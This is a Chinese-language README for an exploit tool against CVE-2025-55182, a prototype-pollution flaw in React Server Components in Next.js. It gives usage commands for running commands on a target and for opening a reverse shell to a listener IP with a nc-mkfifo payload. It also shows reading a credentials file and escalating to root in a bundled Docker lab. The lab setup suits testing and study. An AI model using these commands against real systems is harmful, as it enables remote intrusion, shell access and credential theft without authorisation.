通过原型污染利用 CVE-2025-55182 实现远程代码执行(RCE)。
作者: Severian N.K.
该工具利用 Next.js 应用中 React Server Components 的原型污染漏洞,实现远程代码执行(RCE)。它支持直接命令执行和反弹 Shell 两种方式。
本项目使用 Python 虚拟环境来管理依赖。首先,请确保你已安装 Python 3。
创建虚拟环境:
python3 -m venv venv
激活环境并安装依赖:
source venv/bin/activate
pip install -r requirements.txt
在运行漏洞利用程序之前,请确保虚拟环境已激活(source venv/bin/activate)。
在目标上执行单条命令:
python3 exploit.py -u <TARGET_URL> -c "<COMMAND>"
示例:
python3 exploit.py -u http://example.com -c "id"
从目标获取反弹 Shell:
python3 exploit.py -u <TARGET_URL> -r -l <LISTENER_IP> -p <LISTENER_PORT>
示例:
python3 exploit.py -u http://example.com -r -l 10.10.10.2 -p 9001 -P nc-mkfifo
lab/ 目录包含两个独立的 Docker 环境:
lab/vulnerable):运行在 3000 端口。lab/patched):运行在 3001 端口。cd lab/vulnerable
chmod +x build.sh run.sh
./build.sh
./run.sh
cd lab/patched
chmod +x build.sh run.sh
./build.sh
./run.sh
你必须指定监听 IP(--lhost)和端口(--lport)。你可以通过 ip addr show docker0 查看 Docker 桥接 IP(通常为 172.17.0.1)。
python exploit.py -u http://localhost:3000 -r -l 172.17.0.1 -p 6000 -P nc-mkfifo
注意: 我们使用
-P nc-mkfifo,因为目标运行的是 Alpine Linux,需要特定的 Payload 类型。
存在漏洞的容器暴露了一个机密文件。
python3 exploit.py -u http://localhost:3000 -c "cat /secret/credentials.txt"
# Output: manager:SuperSecret2025!
你可以使用泄露的凭据从 nextjs 提升到 root 权限。
su - manager(密码:SuperSecret2025!)sudo su(密码:SuperSecret2025!)cat /root/flag.txt
# Output: Congratulations! You have gained full control over the system!
欢迎贡献!如果你发现 Bug 或有改进想法,请提交 Issue 或发起 Pull Request。